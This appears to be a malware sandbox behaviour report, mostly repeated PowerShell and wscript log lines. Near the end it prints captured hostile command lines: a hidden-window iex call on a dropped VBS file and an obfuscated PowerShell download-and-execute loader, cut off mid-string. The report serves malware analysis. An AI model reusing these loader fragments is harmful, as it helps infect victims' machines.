          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4455Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5324Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6875Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2785Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7420Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2254Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -11068046444225724s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 6875 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep count: 2785 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep time: -8301034833169293s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44E698000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000004.00000002.1376648468.000001D44FFC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: powershell.exe, 00000001.00000002.1582637126.000002CDC2CC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
          Source: powershell.exe, 00000008.00000002.2678462798.000001336A320000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWtt%SystemRoot%\system32\mswsock.dlld Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_7700.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_832.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7700, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 832, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f170vy.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\p2q.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo 